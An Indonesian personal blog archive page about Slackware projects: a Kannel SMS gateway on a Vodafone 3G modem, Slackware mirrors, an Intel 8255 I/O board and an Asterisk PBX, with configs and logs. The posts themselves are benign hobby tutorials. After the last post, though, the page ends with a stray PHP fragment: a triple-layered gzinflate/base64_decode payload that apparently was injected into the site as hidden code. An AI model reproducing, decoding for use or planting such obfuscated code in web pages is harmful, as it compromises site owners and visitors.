Delicious

Archives

Categories

Archive for 'Slackware' Category





« »

Vodafone modem on Kannel

  ozzie / 18/09/2007

Persiapan mudik lebaran bikin sms-gateway guna memonitoring Rumah, kebetulan dapet suplay beberapa modem PCMCIA :D.. lalu dipakelah yang Vodafone Mobile Connect Card 3G/GPRS;)) tinggal digabung CardBus <:-p **[Meneruskan Petualangan Kemaren]
Vodafone Modem

Dengan bahan dasar slackware 10.2, Kannel, Mysql, Apache, PHP, MRTG dan campuran Wap-MRTG, .. dan lain-lain. Awalnya sempet pusing juga nge-detect modem PCMCIA nya :-s.. berhubung pake Kannel yg jadi engine SMS/WAP nya.. obarak-abrik dokumentasi AT-Command pake minicom ternyata beda di init-stringnya #:-s

group = modems
id = vodafone
speed = 115200
name = VodaFone3G
detect-string = “GlobeTrotter”
init-string = “AT+CNMI=1,2,0,0,0″

udah dapet group modems, lalu pasang di group smc <:-p<:-p

group = smsc
smsc = at
smsc-id = vodafone
modemtype = vodafone
device = /dev/modem

jalanin bearerbox sekalian liat log \:d/\:d/\:d/

………
2007-09-18 01:54:33 [336] [6] INFO: AT2[vodafone]: init device
2007-09-18 01:54:33 [336] [6] INFO: AT2[vodafone]: speed set to 115200
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: –> ATZ^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- ATZ
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- AT
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT&F^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- AT&F
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> ATE0^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- ATE0
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT+IFC=2,2^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT+CPIN?^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- +CPIN: READY
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CSCA=”+62855000000″^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CMGF=0^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CSMS=?^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- +CSMS: (0-1)
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CNMI=1,2,0,0,0^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:34 [336] [6] INFO: AT2[vodafone]: AT SMSC successfully opened.

Tadaaaa…. <:-p<:-p

diteruskan bikin group sms-service di kannel :

group = sms-service
keyword = default
text = “Mana Command-nya Om??”

Bagian ini cuma default kalo parameter salah, dan bakalan ngirim sms balik ke sender :D


group = sms-service
keyword = PORT
get-url = “http://kasur.tahanan.web.id/kerja.php?port=%k&value=%S”
max-message = 3

#:-s#:-s
yang nantinya tinggal kirim sms dengan “Ketik: PORT < spasi > A < spasi > 2″ kirim ke no di rumah 8-}8-} yang akan meng-eksekusi http://kasur.tahanan.web.id/kerja.php?port=A&value=2.. (dikarenakan Beda Mesin dengan SMS-gateway jadi gak pake http://localhost) 8-}8-}8-} ..

sebetulnya liwat Web-Based juga bisa di http://kasur.tahanan.web.id/.. cuman.. :-s:-s.. berhubung keterbatasan bandwidth :">:">, gak kyk di jakarta 8->8-> SSID orang berlimpah8-}8-} tinggal nyantol ;))

Moga-moga nanti pulang mudik Rumah Tahanan & Kandang Raja Singa gak ada problem… dan gak ada yg kena 10 Amper 8-}8-}8-} lumayan 2200 watt 8->8->8-> ………………… aminnnn [-o<[-o<[-o< =))=))=))



Mirror-Slackware

  ozzie / 02/09/2007

Berawal dari kebutuhan.
Dikarenakan Doyan maen, ngoprek slackware, akhirnya server-server banyak yg menggunakan slackware ;));));)). dengan kebutuhan server dalam melakukan update, lalu me-Mirror iso dan packages. guna mempermudah dalam mendapatkan iso dan packages. dan menghemat bandwidth internasional. :D

1. mirror.slackware-id.org
Thx buat om budi yg udah minjemin subdomain ;))
mesin ini berada di Gedung Cyber dan terhubung dengan kapasitas 100Mbps melalui OpenIXP dan IIX.

Mirror Slackware

2. slackware.linux.or.id
Thx buat om ronny yg udah minjemin subdomain ;))
mesin ini berada di sebuah perumahan di kawasan Bekasi [Taman Bougenville] dengan NOC disamping kolam renang :D

3. kebonbinatang.org
mesin ini berada di kolong kasur ane :">:"> :D dengan kapasitas storage 160 GB. dan maksimum koneksi dibatesin cuma 3 Mbps :P:P.. maap ^:)^ ane juga kan mo monitoring & main game :P:P nanti jadi nge-lag gimanah? :-??

disamping iso ada beberapa source yg bermanpaat :D:D.. ijo-ijo dong gan ;));))



Intel 8255 on Slackware 7.1

  ozzie / 29/08/2007

Mungkin Teknologinya udah Basi kali yak?? :-?? dibanding sekarang yang lebih ke USB :-? tapi sekedar Refreshing :> dan kebetulan masih ada yg jual di Glodok 8-}..
8255
FYI: http://dt-51.com/.

Past: Pada masa kejayaannya. PPI8255 cukup naik daun :D.. karena compatible dengan berbagai bahasa programming yang berjalan pada platform Windows 8-}. seperti Assembler, C, Pascal, Basic hingga Delphi..

Today: Berhubung Sekarang ngoprek nya pake Slackware 7.1 di kernel 2.4.18 yang arsitektur kernelnya Sangat berbeda ama win32 8-} maka dibutuhkan tenaga, waktu, pikiran, kopi, rokok ekstra ;)) lebih enak lagih kalo ada cewe ekstra 8->8-> ;)) dan sekian lama browsing akhirnya dapet module disa8255 buat linux\:d/. coba-coba hijrah ke FreeBSD ternyata lebih ribet 8-} pake /dev/pbio :-< ..

untuk sementara output dari DB-25 nya di gabungin ke project-board dulu, sekalian ngoprek di sisi program;)).. yang kebetulan ngopreknya pake bahasa C.:((:(( dari coba yang console [Command Line Interface], coba bikin shell sendiri berbasis TCL, ampe dicampur Dialog. beranjak ke X digabungin ama TCL/TK. dan sekarang pengennya Manageable ke arah Web-Based dengan campuran sedikit AJAX [-o< 8-> ;));))

Future: Keluar dari DB-25 kan jadi 3 port yang masing2 ada 8. kebetulan Port A & Port B sebagai Output. dan port C sebagai Input .. :-?:-? mo di gabungin ama modulenya Relay-Board.. tinggal output dari relay disambung ke rumah kabel di gudang. <:-p lalu setelah protocol HTTP-nya up, yang penting bisa POST ama GET tinggal setup SMS-Gateway dah. pake Kannel juga udah cukup. tinggal banyakin ajah sms-service nya itung2 port-forwarding ;));))
Pulang kampung lampu jalan belon nyala tinggal sms dah.. <:-p<:-p

nih om kalo mo coba;));)).. http://devel.ozzie.web.id
tapi kalo rada berat maklumin ajah :D:D.. spec-nya cuma Pentium I [133Mhz] Ram 16 MB =)) without VGA 8-}

http://blog.ozzie.web.id/?p=128



Planet Slackware

  ozzie / 26/08/2007

Maap Pak… Bu.. Om.. Mas.. Mba.. Tante.. ^:)^ ^:)^
Sayah jarang aktip di milis ama forum lagih. gi rada sibuk.. maklum cuman kacung.. :-< (padahal sih gi asik ama eneng 8-}8-} )

akhirnya coba-coba ngoprek buat Planet Slackware.. cuman masih bingung ama domen-nya yak om?? :>:>

bagi yang mo ikut polling bisa ikutan di Blog-nya om Willy.. :)>-:)>-

UPDATE:
domainnya udah dapet di http://planet.slackware-id.org
thanks buat om Budi dari baliwae.com yang udah nyediain host planet.slackware-id.org



Server Gado-gado

  ozzie / 31/07/2007

Iseng-iseng bikin PBX, VOIP, SIP, IVR Server, dengan spek seadanya. Pentium II 300MHz, campuran Slackware, Asterisk, dan sebuah PCI AX-100P FXO card seharga Rp.250.000-an.. ;));))
FXO

Emang Asterisk (*) komplit banget ;)) Kebetulan Research pake Slackware 10.2, Sekalian testing ENUM \:d/.. Pasang FXO card lalu install Module Drivernya dan Asterisk nya. <:-p kebetulan abis donlot zaptel & asterisk di extract ke /usr/src/

root@kacung-1:/# cd /usr/src/zaptel; make install
root@kacung-1:/# cd ../asterisk; make install
root@kacung-1:/# make samples

install udah selesai, lalu edit file /etc/zapata.conf :
fxsks=1 ;AX-100P
defaultzone=us
loadzone=us

jangan lupa di load module nya:
root@kacung-1:/# modprobe zaptel
root@kacung-1:/# modprobe wcfxo
root@kacung-1:/# ztcfg -vv

lalu edit file konfigurasi asterisk yang umumnya ada di /etc/asterisk/ :

/etc/asterisk/zapata.conf
[channels]
signalling=fxs_ks
context=masukdariluar
channel=>1 ; AX-100P

/etc/asterisk/extensions.conf (Versi Gue 8-} )
[masukdariluar]
exten => s,1,Dial(SIP/001,SIP/002,SIP/003)
;maksudnya biar kalo ada incoming telepon dari pstn di terusin ke extension 001, 002, 003. tergantung siapa yg mo angkat duluan.

Sampe sini.. SIP phone (Softphone/Hardphone) udah bisa nerima call dari luar, <:-p .. kalo mo keluar tinggal tambahin :

/etc/asterisk/extensions.conf
[globals]
TELEPON=Zap/1
KELAMAAN=70
[macro-kepstn]
exten => s,1,SetGlobalVar(FOUNDME=ANSWER)
exten => s,2,Dial(${TELEPON}/9w${ARG1},${ARG2})
exten => s,3,SetGlobalVar(FOUNDME=${DIALSTATUS})
exten => s,4,Dial(s-${DIALSTATUS},1)
exten => s,103,SetGlobalVar(FOUNDME=SIBUK)
exten => s,104,Goto(s-SIBUK,1)
exten => s-SIBUK,1,SetGlobalVar(FOUNDME=SIBUK)
exten => s-SIBUK,2,Goto(s-TUTUP,1)
exten => s-BATAL,1,SetGlobalVar(FOUNDME=BATAL)
exten => s-BATAL,2,Goto(s-TUTUP,1)
exten => s-BOONG,1,SetGlobalVar(FOUNDME=BOONG)
exten => s-BOONG,2,Goto(s-TUTUP,1)
exten => s-GAKADA,1,SetGlobalVar(FOUNDME=GAKADA)
exten => s-GAKADA,2,Goto(s-TUTUP,1)
exten => s-.,1,SetGlobalVar(FOUNDME=BEGO)
exten => s-.,2,Goto(s-TUTUP,1)
exten => s-TUTUP,1,GotoIf($[${ARG3} = RT]?3:2)
exten => s-TUTUP,2,HangUp
exten => s-TUTUP,3,NoOp

:D:D:D maap variabel nya ngaco 8-}8-}.. emang hobby ;)). Semua bisa di Customize, Tergantung Mainin di /etc/asterisk/extensions.conf.. \:d/\:d/ mo bikin greating extensions, music on hold, voicemail, IVR (Interactive Voice Response), DLL.. :D:D.. Manageble via Web-Base ;));))..



slackware.linux.or.id

  ozzie / 07/11/2006


ozzie pake kaos Slackware dong...

Sekian lama menunggu, akhirnya dapet juga domain slackware.linux.or.id. tapi lagi cari isinya :D

bagi yang doyan slackware, ikutan yaaaa…. ditunggu kontribusinya di http://slackware.linux.or.id. ato kalo mao jadi donatur juga boleh :> ya hdd 2 TB gitu.. 8-> buat nyimpen repo =P~ =p~ ato mao mesin nya juga gpp :"> bebas, boleh yang 1U, 2U, 3U, 4U :D :D



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>